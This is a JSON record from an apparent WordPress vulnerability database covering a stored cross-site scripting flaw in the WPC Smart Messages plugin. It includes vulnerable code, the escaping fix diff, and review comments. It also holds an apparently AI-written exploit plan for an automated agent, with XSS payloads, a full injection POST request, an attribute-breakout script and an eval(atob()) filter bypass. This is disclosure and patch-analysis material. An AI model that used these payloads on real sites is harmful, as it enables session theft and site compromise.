[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6FkBccFEqN9ZfD9RAj3VfRdfyY01xhSB8vj4-HeYRwE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-6725","wpc-smart-messages-for-woocommerce-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attribute","WPC Smart Messages for WooCommerce \u003C= 4.2.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attribute","The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'text' attribute of the `wpcsm_text_rotator` shortcode in all versions up to, and including, 4.2.8. This is due to insufficient input sanitization and output escaping on user supplied attributes. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wpc-smart-messages",null,"\u003C=4.2.8","4.2.9","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-27 15:55:16","2026-04-28 04:28:22",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9c1ac689-329a-4459-8b67-176e959cc02d?source=api-prod",1,[22,23,24,25],"includes\u002Fclass-shortcode.php","languages\u002Fwpc-smart-messages.pot","readme.txt","wpc-smart-messages.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-6725 (WPC Smart Messages Stored XSS)\n\n## 1. Vulnerability Summary\nThe **WPC Smart Messages for WooCommerce** plugin (\u003C= 4.2.8) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `text` attribute of the `[wpcsm_text_rotator]` shortcode. The plugin fails to sanitize or escape the user-supplied content of this attribute before rendering it on the page. This allows an authenticated attacker with **Contributor-level** permissions or higher to embed malicious scripts into posts or pages, which will execute in the context of any user viewing the content.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: WordPress Post\u002FPage Editor (standard `wp-admin\u002Fpost.php` or `wp-admin\u002Fpost-new.php`).\n- **Shortcode**: `[wpcsm_text_rotator]`\n- **Vulnerable Parameter**: The `text` attribute within the shortcode.\n- **Authentication**: Required (Contributor role or higher).\n- **Preconditions**: WooCommerce must be installed and active (plugin dependency).\n\n## 3. Code Flow\n1. 
**Registration**: In `includes\u002Fclass-shortcode.php`, the `init()` method registers the shortcode:\n   ```php\n   add_shortcode( 'wpcsm_text_rotator', [ $this, 'text_rotator' ] );\n   ```\n2. **Processing**: When a page containing the shortcode is rendered, WordPress calls the `text_rotator($attrs)` method in `Wpcsm_Shortcode` (found in `includes\u002Fclass-shortcode.php`).\n3. **Handling Attributes**: The function extracts attributes, including `text`.\n4. **Splitting Logic (Inferred)**: Based on the plugin's description in `self::$shortcodes`, the `text` attribute is split by commas:\n   `\"text split by a comma\"`\n5. **The Sink (Inferred)**: The code likely loops through the split strings and returns them wrapped in HTML tags without calling `esc_html()` or `esc_attr()`. \n   ```php\n   \u002F\u002F Likely vulnerable logic:\n   $texts = explode(',', $atts['text']);\n   foreach($texts as $t) {\n       $output .= '\u003Cdiv class=\"wpcsm-text-item\">' . $t . '\u003C\u002Fdiv>'; \u002F\u002F SINK: Unescaped variable $t\n   }\n   ```\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited by saving a standard WordPress post\u002Fpage. There is no specific plugin-level nonce for the shortcode rendering itself, but a standard WordPress `_wpnonce` is required to save a post.\n\n**Strategy for the Automated Agent:**\n1. Log in to the WordPress dashboard as a **Contributor**.\n2. Navigate to `wp-admin\u002Fpost-new.php`.\n3. Extract the `_wpnonce` and `post_ID` from the HTML form.\n   - Nonce Location: `input[name=\"_wpnonce\"]`\n   - Post ID Location: `input[name=\"post_ID\"]`\n4. Use these to send the `editpost` request via `http_request`.\n\n## 5. Exploitation Strategy\nThe exploit involves creating a post with a malicious shortcode attribute.\n\n### Step-by-Step Plan:\n1. **Login**: Authenticate as a Contributor.\n2. **Identify Target**: Access `wp-admin\u002Fpost-new.php` to obtain a `post_ID` (WordPress creates an auto-draft).\n3. 
**Craft Payload**:\n   - The payload must avoid commas (as the plugin splits by comma).\n   - Payload: `\u003Cimg src=x onerror=alert(document.domain)>`\n   - Full Shortcode: `[wpcsm_text_rotator text=\"\u003Cimg src=x onerror=alert(document.domain)>\"]`\n4. **Submit Injection**: Send an HTTP POST request to `wp-admin\u002Fpost.php`.\n\n### HTTP Request Details (Example):\n```http\nPOST \u002Fwp-admin\u002Fpost.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=editpost&\n_wpnonce=[EXTRACTED_NONCE]&\npost_ID=[POST_ID]&\npost_title=Test+XSS&\npost_type=post&\ncontent=%5Bwpcsm_text_rotator+text%3D%22%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E%22%5D&\npublish=Publish\n```\n\n## 6. Test Data Setup\n1. **Install WooCommerce**: Ensure WooCommerce is installed and active.\n2. **Create User**:\n   ```bash\n   wp user create attacker attacker@example.com --role=contributor --user_pass=password\n   ```\n3. **Verify Plugin Version**: Ensure `wpc-smart-messages` version is `\u003C= 4.2.8`.\n\n## 7. Expected Results\n- When the post is saved, the database will store the shortcode literally.\n- When an administrator or any visitor navigates to the published post's URL, the browser will receive the raw `\u003Cimg src=x onerror=alert(document.domain)>` tag inside the text rotator container.\n- An alert box displaying the document domain will appear.\n\n## 8. Verification Steps\n1. **Database Check**: Verify the shortcode is stored.\n   ```bash\n   wp post get [POST_ID] --field=post_content\n   ```\n2. **Response Body Check**: Fetch the frontend URL of the post and search for the unescaped payload.\n   ```bash\n   # Use the agent to fetch the page and check for:\n   # \u003Cimg src=x onerror=alert(document.domain)>\n   ```\n\n## 9. 
Alternative Approaches\n- **Attribute Breakout**: If the `animation` attribute is also unescaped, try breaking out of the `data-animation` attribute:\n  `[wpcsm_text_rotator animation='\">\u003Cscript>alert(1)\u003C\u002Fscript>' text='test']`\n- **Smart Messages CPT**: Check if the plugin allows Contributors to create \"Smart Messages\" via the `wpcsm_message` custom post type. If so, inject the shortcode directly into the `Message` field (`includes\u002Fclass-backend.php:878`).\n- **Complex Payloads**: If complex JS is needed (which requires commas), use `eval(atob('...'))` to bypass the `explode(',', ...)` logic.","The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'text' attribute of the wpcsm_text_rotator and wpcsm_live_number shortcodes. In versions up to 4.2.8, the plugin fails to sanitize or escape user-supplied attributes before rendering them, allowing authenticated attackers with contributor-level permissions to inject malicious scripts that execute in the context of any user viewing the page.","\u002F\u002F includes\u002Fclass-shortcode.php (around line 456)\n$output .= '\u003Cspan class=\"wpcsm-text-rotator\" data-animation=\"' . esc_attr( $attrs['animation'] ) . '\" data-speed=\"' . esc_attr( $attrs['speed'] ) . '\">' . $attrs['text'] . '\u003C\u002Fspan>';\n\n---\n\n\u002F\u002F includes\u002Fclass-shortcode.php (around line 487)\n$output .= sprintf( $attrs['text'], '\u003Cspan class=\"wpcsm-number-rotator-value wpcsm-text-rotator\" data-animation=\"' . esc_attr( $attrs['animation'] ) . '\" data-speed=\"' . esc_attr( $attrs['duration'] ) . '\">' . implode( ', ', $rand_values ) . '\u003C\u002Fspan>' );\n\n---\n\n\u002F\u002F includes\u002Fclass-shortcode.php (around line 491)\n$output .= sprintf( $attrs['text'], '\u003Cspan class=\"wpcsm-live-number-value\">' . $rand . 
'\u003C\u002Fspan>' );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpc-smart-messages\u002F4.2.8\u002Fincludes\u002Fclass-shortcode.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpc-smart-messages\u002F4.2.9\u002Fincludes\u002Fclass-shortcode.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpc-smart-messages\u002F4.2.8\u002Fincludes\u002Fclass-shortcode.php\t2026-03-28 06:48:48.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwpc-smart-messages\u002F4.2.9\u002Fincludes\u002Fclass-shortcode.php\t2026-04-21 02:58:20.000000000 +0000\n@@ -456,7 +456,7 @@\n \t\t\t\t'animation' => 'dissolve' \u002F\u002Fdissolve (default), fade, flip, flipUp, flipCube, flipCubeUp and spin\n \t\t\t], $attrs );\n \n-\t\t\t$output .= '\u003Cspan class=\"wpcsm-text-rotator\" data-animation=\"' . esc_attr( $attrs['animation'] ) . '\" data-speed=\"' . esc_attr( $attrs['speed'] ) . '\">' . $attrs['text'] . '\u003C\u002Fspan>';\n+\t\t\t$output .= '\u003Cspan class=\"wpcsm-text-rotator\" data-animation=\"' . esc_attr( $attrs['animation'] ) . '\" data-speed=\"' . esc_attr( $attrs['speed'] ) . '\">' . esc_html( $attrs['text'] ) . '\u003C\u002Fspan>';\n \n \t\t\treturn apply_filters( 'wpcsm_shortcode_live_number', $output, $attrs );\n \t\t}\n@@ -484,11 +484,11 @@\n \t\t\t\t}\n \n \t\t\t\t$output .= '\u003Cspan class=\"wpcsm-number-rotator\">';\n-\t\t\t\t$output .= sprintf( $attrs['text'], '\u003Cspan class=\"wpcsm-number-rotator-value wpcsm-text-rotator\" data-animation=\"' . esc_attr( $attrs['animation'] ) . '\" data-speed=\"' . esc_attr( $attrs['duration'] ) . '\">' . implode( ', ', $rand_values ) . '\u003C\u002Fspan>' );\n+\t\t\t\t$output .= sprintf( esc_html( $attrs['text'] ), '\u003Cspan class=\"wpcsm-number-rotator-value wpcsm-text-rotator\" data-animation=\"' . esc_attr( $attrs['animation'] ) . '\" data-speed=\"' . 
esc_attr( $attrs['duration'] ) . '\">' . implode( ', ', $rand_values ) . '\u003C\u002Fspan>' );\n \t\t\t\t$output .= '\u003C\u002Fspan>';\n \t\t\t} else {\n \t\t\t\t$output .= '\u003Cspan class=\"wpcsm-live-number\" data-val=\"' . esc_attr( $rand ) . '\" data-min=\"' . esc_attr( $attrs['min'] ) . '\" data-max=\"' . esc_attr( $attrs['max'] ) . '\" data-step=\"' . esc_attr( $attrs['step'] ) . '\" data-duration=\"' . esc_attr( $attrs['duration'] ) . '\" data-text=\"' . esc_attr( $attrs['text'] ) . '\">';\n-\t\t\t\t$output .= sprintf( $attrs['text'], '\u003Cspan class=\"wpcsm-live-number-value\">' . $rand . '\u003C\u002Fspan>' );\n+\t\t\t\t$output .= sprintf( esc_html( $attrs['text'] ), '\u003Cspan class=\"wpcsm-live-number-value\">' . $rand . '\u003C\u002Fspan>' );\n \t\t\t\t$output .= '\u003C\u002Fspan>';\n \t\t\t}","The exploit is executed by an authenticated user with Contributor-level access or higher. 1. The attacker logs into the WordPress dashboard and begins creating or editing a post or page. 2. In the post content, the attacker inserts the shortcode `[wpcsm_text_rotator text=\"\u003Cimg src=x onerror=alert(document.domain)>\"]`. Alternatively, the `[wpcsm_live_number]` shortcode can be used similarly with malicious content in its `text` attribute. 3. Upon saving and publishing the post, WordPress stores the shortcode literal. 4. When any user (including an administrator) visits the page on the frontend, the plugin processes the shortcode and outputs the raw HTML from the `text` attribute into the page source without escaping. 
This triggers the execution of the arbitrary JavaScript payload.","gemini-3-flash-preview","2026-05-04 18:18:02","2026-05-04 18:18:40",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","4.2.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpc-smart-messages\u002Ftags\u002F4.2.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpc-smart-messages.4.2.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpc-smart-messages\u002Ftags\u002F4.2.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpc-smart-messages.4.2.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpc-smart-messages\u002Ftags"]
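Review bot: in the `@@ -456,7 +456,7 @@` hunk the trailing context line is `return apply_filters( 'wpcsm_shortcode_live_number', $output, $attrs );`, yet the span being escaped on the changed line carries class `wpcsm-text-rotator`; the hook name reads as copied from the live-number shortcode, so confirm it is intended, and document for filter consumers that `$output` now arrives with the `text` attribute already passed through `esc_html()`, so callbacks must not unescape it or splice the raw `$attrs['text']` back in.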
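Review bot: in the `@@ -484,11 +484,11 @@` hunk both changed lines escape the `sprintf()` format string rather than the rendered value, which keeps the `%s` placeholder and the injected `<span>` markup intact but leaves `%` untouched, so a `text` attribute with no `%s`, more than one conversion specifier, or a stray `%` still reaches `sprintf()` unchecked (PHP 8 throws `ArgumentCountError` when the format needs more arguments than are supplied). Consider validating that `text` contains exactly one `%s` before the call, or substituting a literal token with `str_replace()` instead of a format string; a one-line comment would also help, since the same raw `text` is separately emitted through `esc_attr()` in the `data-text` attribute two lines above and a reader may otherwise assume the two escapes are interchangeable.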